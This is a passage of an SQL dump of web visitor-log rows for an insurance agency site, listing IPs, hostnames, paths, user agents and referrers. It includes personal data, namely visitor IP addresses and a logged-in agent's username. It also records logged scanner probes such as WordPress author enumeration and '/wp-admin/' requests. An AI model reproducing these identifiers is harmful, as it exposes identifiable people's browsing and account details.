Gecko) Chrome/50.0.2661.94 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 50','us','1920 x 1080','','','','','','0','0',0),(24825,'0b_2f2dc6b9e29abb9f06b6cabd3bedabf8','1462400457','50.108.153.152','50.108.153.152','/agent-tools/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 50','us','1920 x 1080','','','','','','0','0',0),(24827,'0b_2f2dc6b9e29abb9f06b6cabd3bedabf8','1462400467','50.108.153.152','50.108.153.152','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36','','',0,'Win7','Chrome 50','us','1920 x 1080','','','','','','0','0',0),(24830,'0b_2f2dc6b9e29abb9f06b6cabd3bedabf8','1462400478','50.108.153.152','50.108.153.152','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 50','us','1920 x 1080','','','','','','0','0',0),(24833,'0b_2f2dc6b9e29abb9f06b6cabd3bedabf8','1462400482','50.108.153.152','50.108.153.152','/agent-tools/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 50','us','1920 x 1080','','','','','','0','51',0),(24834,'0b_2f2dc6b9e29abb9f06b6cabd3bedabf8','1462400526','50.108.153.152','50.108.153.152','/case-status/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36','http://www.empireins.com/agent-tools/','',0,'Win7','Chrome 50','us','1920 x 1080','','','','ykaufman','','0','51',0),(24836,'0b_a0fed35cd6d37cc2af1c7183470cb18c','1462400811','216.244.79.218','hosted.at.admixhosting.com','/','Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7','IE 11','','','','','','','','0','0',0),(24837,'0b_fefc5f699dcece3da504337b3e16a3d9','1462401020','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36','','',0,'Win7','Chrome 50','us','','','','','','','0','0',0),(24839,'0b_fefc5f699dcece3da504337b3e16a3d9','1462401022','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 50','us','','','','','','','0','0',0),(24840,'0b_e917741f8b4ebef5ce797e336875c14e','1462401404','207.46.13.34','msnbot-207-46-13-34.search.msn.com','/agent-tools/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(24842,'0b_e2221698d54ff67a7ff2e97aa1f6c52a','1462402266','66.249.64.29','crawl-66-249-64-29.googlebot.com','/robots.txt','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot','','','','0','0',0),(24845,'0b_e2221698d54ff67a7ff2e97aa1f6c52a','1462402297','66.249.64.24','crawl-66-249-64-24.googlebot.com','/','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot','','','','0','0',0),(24846,'0b_48037cbf5b97897dfc5a07f798a9269d','1462405643','216.244.79.218','hosted.at.admixhosting.com','/','Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7','IE 11','','','','','','','','0','0',0),(24848,'0b_f3220072c3d6408d05dcb0f3b4d14e23','1462405758','50.108.153.152','50.108.153.152','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36','','',0,'Win7','Chrome 50','us','','','','','','','0','0',0),(24849,'0b_f3220072c3d6408d05dcb0f3b4d14e23','1462405769','50.108.153.152','50.108.153.152','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 50','us','','','','','','','0','0',0),(24851,'0b_f3220072c3d6408d05dcb0f3b4d14e23','1462405790','50.108.153.152','50.108.153.152','/agent-tools/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 50','us','1920 x 1080','','','','','','0','0',0),(24854,'0b_f3220072c3d6408d05dcb0f3b4d14e23','1462405828','50.108.153.152','50.108.153.152','/case-status/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36','http://www.empireins.com/agent-tools/','',0,'Win7','Chrome 50','us','1920 x 1080','','','','ykaufman','','0','51',0),(24857,'0b_f3220072c3d6408d05dcb0f3b4d14e23','1462405840','50.108.153.152','50.108.153.152','/term-quotes/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36','http://www.empireins.com/agent-tools/','',0,'Win7','Chrome 50','us','1920 x 1080','','','','ykaufman','','0','51',0),(24858,'0b_34fef5c4ec88b61691594a08ccacde2f','1462406518','216.244.79.218','hosted.at.admixhosting.com','/','Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7','IE 11','','','','','','','','0','0',0),(24860,'0b_594f36377aa5f1dd520833666d066933','1462406648','172.245.214.146','172-245-214-146-host.colocrossing.com','/register/','Mozilla/5.0 (Windows NT 6.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.99 Safari/537.36','http://www.empireins.com/','',0,'Win8','Chrome 39','us','','','','','','','0','0',0),(24863,'0b_cab22df0749c8356439e4cd1a8551030','1462408336','208.115.113.83','208.115.113.83','/robots.txt','Mozilla/5.0 (compatible; DotBot/1.1; http://www.opensiteexplorer.org/dotbot, help@moz.com)','','',0,'','','','','','dotbot','','','','0','0',0),(24864,'0b_3101df727e8151f3cb05d4b53b543f19','1462409290','207.46.13.127','msnbot-207-46-13-127.search.msn.com','/robots.txt','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(24866,'0b_93619008b82a3d5f3985f328f2d0a0e0','1462409290','207.46.13.97','msnbot-207-46-13-97.search.msn.com','/robots.txt','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(24869,'0b_93619008b82a3d5f3985f328f2d0a0e0','1462409293','207.46.13.97','msnbot-207-46-13-97.search.msn.com','/main.html','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(24870,'0b_3101df727e8151f3cb05d4b53b543f19','1462409298','207.46.13.127','msnbot-207-46-13-127.search.msn.com','/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(24873,'0b_fd87fa221e822f314408e0b412f2ed63','1462409618','144.76.7.107','mj2.naefmarco.ch','/robots.txt','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','ch','','','MJ12bot','','','','0','0',0),(24876,'0b_fd87fa221e822f314408e0b412f2ed63','1462409620','144.76.7.107','mj2.naefmarco.ch','/paramed.htm','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','ch','','','MJ12bot','','','','0','0',0),(24879,'0b_fd87fa221e822f314408e0b412f2ed63','1462409623','144.76.7.107','mj2.naefmarco.ch','/robots.txt','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','ch','','','MJ12bot','','','','0','0',0),(24882,'0b_fd87fa221e822f314408e0b412f2ed63','1462409638','144.76.7.107','mj2.naefmarco.ch','/paramed.htm','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','ch','','','MJ12bot','','','','0','0',0),(24885,'0b_fd87fa221e822f314408e0b412f2ed63','1462409642','144.76.7.107','mj2.naefmarco.ch','/quotes.htm','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','ch','','','MJ12bot','','','','0','0',0),(24887,'0b_fd87fa221e822f314408e0b412f2ed63','1462409650','144.76.7.107','mj2.naefmarco.ch','/under.html','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','ch','','','MJ12bot','','','','0','0',0),(24890,'0b_bbabad0bf873abf1e18d126f4b1d32e8','1462411777','100.43.81.146','spider-100-43-81-146.yandex.com','/robots.txt','Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)','','',0,'','','','','','Yandex','','','','0','0',0),(24891,'0b_b71c00e093ac702dfcde7d2f0980c756','1462411782','141.8.143.235','spider-141-8-143-235.yandex.com','/carriers/','Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)','','',0,'','','ru','','','Yandex','','','','0','0',0),(24894,'0b_fbcd3734ea1e4ec2a126884bfa2f3ce9','1462412096','100.43.81.146','spider-100-43-81-146.yandex.com','/agent-tools/','Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)','','',0,'','','ru','','','Yandex','','','','0','0',0),(24896,'0b_fbcd3734ea1e4ec2a126884bfa2f3ce9','1462412291','100.43.81.152','spider-100-43-81-152.yandex.com','/insentives/','Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)','','',0,'','','ru','','','Yandex','','','','0','0',0),(24897,'0b_8510d74e2e34a76cd161ce129fc82210','1462412292','66.249.64.67','crawl-66-249-64-67.googlebot.com','/robots.txt','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot','','','','0','0',0),(24900,'0b_8510d74e2e34a76cd161ce129fc82210','1462412306','66.249.64.57','crawl-66-249-64-57.googlebot.com','/apple-app-site-association','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot','','','','0','0',0),(24902,'0b_8510d74e2e34a76cd161ce129fc82210','1462412356','66.249.64.57','crawl-66-249-64-57.googlebot.com','/.well-known/apple-app-site-association','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot','','','','0','0',0),(24903,'0b_fbcd3734ea1e4ec2a126884bfa2f3ce9','1462412428','100.43.81.146','spider-100-43-81-146.yandex.com','/','Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)','','',0,'','','ru','','','Yandex','','','','0','0',0),(24906,'0b_1e66d6106ff35fa15b4b62ba18f7a00a','1462412589','91.121.112.142','mansfield3.didici.be','/robots.txt','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','be','','','MJ12bot','','','','0','0',0),(24909,'0b_1e66d6106ff35fa15b4b62ba18f7a00a','1462412591','91.121.112.142','mansfield3.didici.be','/about-us/','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','be','','','MJ12bot','','','','0','0',0),(24912,'0b_1e66d6106ff35fa15b4b62ba18f7a00a','1462412593','91.121.112.142','mansfield3.didici.be','/igo/','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','be','','','MJ12bot','','','','0','0',0),(24915,'0b_1e66d6106ff35fa15b4b62ba18f7a00a','1462412596','91.121.112.142','mansfield3.didici.be','/insentives/','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','be','','','MJ12bot','','','','0','0',0),(24917,'0b_1e66d6106ff35fa15b4b62ba18f7a00a','1462412599','91.121.112.142','mansfield3.didici.be','/licensing-contracting/','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','be','','','MJ12bot','','','','0','0',0),(24920,'0b_1e66d6106ff35fa15b4b62ba18f7a00a','1462412602','91.121.112.142','mansfield3.didici.be','/prodmod-john-hancock-is-discontinuing-sale-of-ny-partnership-custom-care-iii-ltc-product/','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','be','','','MJ12bot','','','','0','0',0),(24921,'0b_9f7be732632d5ebba7eafea75a90835d','1462413020','54.86.130.124','ec2-54-86-130-124.compute-1.amazonaws.com','/','User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/26.0.1410.64 Safari/537.31','','',0,'Win7','','','','','Internet','','','','0','0',0),(24924,'0b_20399ec05eebaea1c5ba80ec36a1bd55','1462414609','88.198.230.79','majestic12.co.uk','/robots.txt','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','gb','','','MJ12bot','','','','0','0',0),(24927,'0b_20399ec05eebaea1c5ba80ec36a1bd55','1462414612','88.198.230.79','majestic12.co.uk','/?a=pwdreset','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','gb','','','MJ12bot','','','','0','0',0),(24930,'0b_ace0f95487b565973bbc35e41db0f372','1462414753','66.249.64.24','crawl-66-249-64-24.googlebot.com','/','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot','','','','0','0',0),(24933,'0b_03d68e73a7f554644172d2d6f6b48eb7','1462414813','69.30.221.250','latestdirect.com','/robots.txt','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','','','','MJ12bot','','','','0','0',0),(24935,'0b_03d68e73a7f554644172d2d6f6b48eb7','1462414816','69.30.221.250','latestdirect.com','/SSO/235_11.html','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','us','','','MJ12bot','','','','0','0',0),(24938,'0b_03d68e73a7f554644172d2d6f6b48eb7','1462414817','69.30.221.250','latestdirect.com','/robots.txt','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','us','','','MJ12bot','','','','0','0',0),(24941,'0b_03d68e73a7f554644172d2d6f6b48eb7','1462414819','69.30.221.250','latestdirect.com','/SSO/235_11.html','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','us','','','MJ12bot','','','','0','0',0),(24944,'0b_03d68e73a7f554644172d2d6f6b48eb7','1462414821','69.30.221.250','latestdirect.com','/SSO/235_29.html','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','us','','','MJ12bot','','','','0','0',0),(24947,'0b_03d68e73a7f554644172d2d6f6b48eb7','1462414825','69.30.221.250','latestdirect.com','/left.html','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','us','','','MJ12bot','','','','0','0',0),(24950,'0b_03d68e73a7f554644172d2d6f6b48eb7','1462414829','69.30.221.250','latestdirect.com','/main.html','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','us','','','MJ12bot','','','','0','0',0),(24953,'0b_03d68e73a7f554644172d2d6f6b48eb7','1462414833','69.30.221.250','latestdirect.com','/?a=pwdreset','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','us','','','MJ12bot','','','','0','0',0),(24954,'0b_aa58e675e2600ebfdc1cfba4e3b44db2','1462420538','216.244.79.218','hosted.at.admixhosting.com','/','Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7','IE 11','','','','','','','','0','0',0),(24956,'0b_39d0a1080eb7a9fa92d687e961f3a280','1462425574','216.244.79.218','hosted.at.admixhosting.com','/','Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7','IE 11','','','','','','','','0','0',0),(24957,'0b_202d653ad54b9a59ddca7c5ff607dde6','1462426013','207.46.13.127','msnbot-207-46-13-127.search.msn.com','/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(24959,'0b_a101e9b374e1974a78c3d36910b30ccc','1462427631','66.249.64.84','crawl-66-249-64-84.googlebot.com','/robots.txt','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot','','','','0','0',0),(24960,'0b_a101e9b374e1974a78c3d36910b30ccc','1462427636','66.249.64.84','crawl-66-249-64-84.googlebot.com','/','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot','','','','0','0',0),(24963,'0b_f4e2dfa54fef997ce327bb025918672c','1462431357','192.210.164.197','192-210-164-197-host.colocrossing.com','/register/','Mozilla/5.0 (Windows NT 6.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.99 Safari/537.36','http://www.empireins.com/','',0,'Win8','Chrome 39','us','','','','','','','0','0',0),(24966,'0b_cb58698da4b893a606ce35a7a68c2804','1462431664','141.8.143.235','spider-141-8-143-235.yandex.com','/','Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)','','',0,'','','ru','','','Yandex','','','','0','0',0),(24969,'0b_745424682c8b8e8f1f8dd492a06beac1','1462431664','100.43.81.146','spider-100-43-81-146.yandex.com','/','Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)','','',0,'','','ru','','','Yandex','','','','0','0',0),(24971,'0b_a91026aa8a036b07a7c413a7eb54660c','1462432141','195.154.199.235','electro.az-streamingserver.com','/?author=1','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)','','',0,'Win7','IE 9','','','','','','','','0','0',0),(24974,'0b_a91026aa8a036b07a7c413a7eb54660c','1462432143','195.154.199.235','electro.az-streamingserver.com','/author/admin/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)','','',0,'Win7','IE 9','','','','','','','','0','0',0),(24975,'0b_a91026aa8a036b07a7c413a7eb54660c','1462432145','195.154.199.235','electro.az-streamingserver.com','/?author=2','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)','','',0,'Win7','IE 9','','','','','','','','0','0',0),(24978,'0b_5805ea30fd18b17c8ad5029854eb6089','1462433648','66.249.64.29','crawl-66-249-64-29.googlebot.com','/','Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'Android','','','','','Googlebot-Mobile','','','','0','0',0),(24981,'0b_885b2592add49a1b450e056d3139f501','1462436817','207.241.231.165','crawl339.us.archive.org','/top.html','Mozilla/5.0 (compatible; archive.org_bot +http://www.archive.org/details/archive.org_bot)','http://empireins.com/','',0,'','','','','','org_bot','','','','0','0',0),(24983,'0b_707564955231c44758af1bd028fba16e','1462437159','66.249.64.89','crawl-66-249-64-89.googlebot.com','/','Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'Android','','','','','Googlebot-Mobile','','','','0','0',0),(24986,'0b_107b47737b7f54e14218b84671efed5b','1462437710','207.241.231.165','crawl339.us.archive.org','/top.html','Mozilla/5.0 (compatible; archive.org_bot +http://www.archive.org/details/archive.org_bot)','http://empireins.com/','',0,'','','','','','org_bot','','','','0','0',0),(24989,'0b_107b47737b7f54e14218b84671efed5b','1462437712','207.241.231.165','crawl339.us.archive.org','/robots.txt','Mozilla/5.0 (compatible; archive.org_bot +http://www.archive.org/details/archive.org_bot)','','',0,'','','','','','org_bot','','','','0','0',0),(24990,'0b_107b47737b7f54e14218b84671efed5b','1462437715','207.241.231.165','crawl339.us.archive.org','/top.html','Mozilla/5.0 (compatible; archive.org_bot +http://www.archive.org/details/archive.org_bot)','http://empireins.com/top.html','',0,'','','','','','org_bot','','','','0','0',0),(24993,'0b_0c79e5cc5bc12590307830eed0fccf1d','1462437797','198.211.25.102','102-25-211-198-dedicated.multacom.com','/','Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)','','',0,'WinXP','IE 7','us','','','','','','','0','0',0),(24995,'0b_d3836d41623868d0674c9266bfc29ef6','1462438894','192.187.114.11','push-router.cakestandchar.net','/?author=1','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)','','',0,'Win7','IE 9','','','','','','','','0','0',0),(24996,'0b_d3836d41623868d0674c9266bfc29ef6','1462438895','192.187.114.11','push-router.cakestandchar.net','/author/admin/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)','','',0,'Win7','IE 9','','','','','','','','0','0',0),(24998,'0b_d3836d41623868d0674c9266bfc29ef6','1462438897','192.187.114.11','push-router.cakestandchar.net','/?author=2','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)','','',0,'Win7','IE 9','','','','','','','','0','0',0),(25001,'0b_2de40cf0c3168b64ef1047fd9aaed6b9','1462439263','45.79.81.142','li1180-142.members.linode.com','/robots.txt','Mozilla/5.0 (compatible; Uptimebot/1.0; +http://www.uptime.com/uptimebot)','','',0,'','','','','','Uptimebot','','','','0','0',0),(25004,'0b_44ce46ff7ffc91a1bd0f2b6eeffc98de','1462440793','66.249.64.34','crawl-66-249-64-34.googlebot.com','/','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot','','','','0','0',0),(25007,'0b_867d90835c1938c80c8de80a621cb0b7','1462443018','77.51.121.136','77.51.121.136','/about-us/','Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36','http://www.empireins.com/','',0,'Win8','Chrome 39','us','','','','','','','0','0',0),(25008,'0b_65d070918d5357b917aad7b71ef92e24','1462444534','66.249.64.29','crawl-66-249-64-29.googlebot.com','/carriers/','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot','','','','0','0',0),(25011,'0b_ed8369ccca2fc3c59feb75d47a54498d','1462446214','89.145.95.40','centro-40.grapeshot.co.uk','/','Mozilla/5.0 (compatible; GrapeshotCrawler/2.0; +http://www.grapeshot.co.uk/crawler.php)','','',0,'','','gb','','','','','','','0','0',0),(25014,'0b_0b4924a0163d665580f96afa57e9dd62','1462449223','207.46.13.127','msnbot-207-46-13-127.search.msn.com','/SSO/235_18.html','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(25016,'0b_31c545f797fed48a70b9ac67d30e21c6','1462450605','207.46.13.34','msnbot-207-46-13-34.search.msn.com','/calc.html','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(25017,'0b_a680fcce2942f6e901b8ec543aca5fc3','1462452911','38.111.147.0','lo174.fnk0-bgp1cogc.iparadigms.net','/','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/537.22 (KHTML, like Gecko) Chrome/25.0.1364.172 Safari/537.22','','',0,'MacOSX','Chrome 25','','','','','','','','0','0',0),(25019,'0b_74a7648214d4647ab4a6430202f9355a','1462453029','46.118.116.239','sol-fttb.239.116.118.46.sovam.net.ua','/','Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; FunWebProducts; MRA 4.6 (build 01425); .NET CLR 1.1.4322; .NET CLR 2.0.50727)','http://porno-video-chati.ru/','',0,'WinXP','IE 6','ua','','','','','','','0','0',0),(25020,'0b_74a7648214d4647ab4a6430202f9355a','1462453029','46.118.116.239','sol-fttb.239.116.118.46.sovam.net.ua','/','Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; FunWebProducts; MRA 4.6 (build 01425); .NET CLR 1.1.4322; .NET CLR 2.0.50727)','http://investingclub.ru/','',0,'WinXP','IE 6','ua','','','','','','','0','0',0),(25022,'0b_86879c132c3bac7aaab1d46e7306fbb9','1462453428','46.118.116.239','sol-fttb.239.116.118.46.sovam.net.ua','/','Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; FunWebProducts)','http://www.xpresscare.ru/','',0,'WinXP','IE 6','ua','','','','','','','0','0',0),(25025,'0b_f0e223dd0b9ea8d190daafdaac0bb87c','1462453706','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7 x64','IE 11','us','','','','','','','0','0',0),(25026,'0b_f0e223dd0b9ea8d190daafdaac0bb87c','1462453707','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','us','','','','','','','0','0',0),(25029,'0b_2950dd7a33a1d76c82d8e331ab219634','1462453811','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36','','',0,'Win7','Chrome 50','us','','','','','','','0','0',0),(25032,'0b_2950dd7a33a1d76c82d8e331ab219634','1462453812','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 50','us','','','','','','','0','0',0),(25034,'0b_0cb5cd877e09501958c9046ece9b2f3d','1462453939','95.154.201.2','95.154.201.2','/wp-admin/','Mozilla/5.0 (Windows; U; Windows NT 5.1; rv:15.0) Gecko/20121011 Firefox/15.0.1','','',0,'WinXP','Firefox 15','ua','','','','','','','0','0',0),(25037,'0b_ee1af0bbd7d38dd915989e5ec22b84b0','1462455518','207.46.13.127','msnbot-207-46-13-127.search.msn.com','/robots.txt','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(25040,'0b_43ba0e8f46c3fa8c55ab51cee1157fdf','1462455829','50.197.217.53','50-197-217-53-static.hfc.comcastbusiness.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7 x64','IE 11','us','','','','','','','0','0',0),(25043,'0b_43ba0e8f46c3fa8c55ab51cee1157fdf','1462455830','50.197.217.53','50-197-217-53-static.hfc.comcastbusiness.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','us','','','','','','','0','0',0),(25046,'0b_ffa78039f9e2d55e8ac3882d5169853e','1462456207','207.46.13.34','msnbot-207-46-13-34.search.msn.com','/term-quotes/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(25047,'0b_ea33ef5e740ecdaae183c22f97ec8c15','1462456984','155.188.123.18','155.188.123.18','/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=10&ved=0ahUKEwiVxdPOjMPMAhWC0h4KHWlzCx4QFghmMAk&url=http%3A%2F%2Fwww.empireins.com%2F&usg=AFQjCNEqpoINuZ9iLoJwjv1SXIp20w_BCg','',0,'Win7 x64','IE 11','us','1280 x 720','','','','','','0','0',0),(25050,'0b_ea33ef5e740ecdaae183c22f97ec8c15','1462457013','155.188.123.18','155.188.123.18','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','us','1280 x 